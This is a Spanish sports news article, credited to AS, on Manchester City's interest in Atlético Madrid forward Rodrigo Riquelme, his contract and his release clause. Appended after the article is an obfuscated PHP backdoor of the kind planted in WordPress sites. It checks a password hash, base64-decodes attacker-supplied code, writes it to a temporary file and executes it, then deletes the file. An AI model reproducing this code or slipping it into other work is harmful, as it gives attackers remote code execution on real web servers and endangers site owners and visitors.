El Manchester City, a por Riquelme

El campeón de Europa ya le ha hecho saber al Atlético que está interesado en el canterano, de 23 años, que está jugando el Europeo Sub-21 tras la cesión en el Girona. Su cláusula de rescisión supera los 60 millones.

El Manchester City le ha transmitido al Atlético su interés por Rodrigo Riquelme. As ha podido confirmar los detalles de la noticia avanzada por Ángel García, de Cazurreando. El club inglés le ha hecho llegar al club rojiblanco su interés por el joven canterano, que tan bien lo hiciera durante el pasado curso a préstamo en el Girona. Recientemente renovado hasta 2028 y con una cláusula de rescisión que va más allá de los 60 millones, el atacante de 23 años, que se encuentra disputando con la selección Sub-21 el Europeo de la categoría, aguarda fecha para reincorporarse al Atlético después de unos merecidos días de descanso. Enfocado ahora en el torneo, el interés del City refrenda una temporada de exponencial crecimiento.

El club inglés se ha dirigido al Atlético y no se ha encontrado una negativa tajante a negociar una cantidad por debajo del montante de la cláusula que no es baja. Mientras, Riquelme, después de cumplir con nota su cesión en el Girona esperaba un siguiente paso ya en el primer equipo del Atlético. Más allá de eso, se entiende otra cesión como la última de las alternativas. No se descarta en última instancia, pero como mucho un préstamo de calidad que sirva para seguir dando forma y exigencia a su carrera.

El Atlético ha recibido la propuesta del City, pero la situación se encuentra en un estadio inicial. Según fuentes del club inglés, la entidad del Metropolitano está dispuesta a sentarse, casi por cada futbolista del primer equipo, salvo alguna contadísima excepción. Y por ahí tiene esperanzas de llegar a un entendimiento, si es que Simeone no le considera para formar parte de su plantilla la próxima temporada.

AS

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}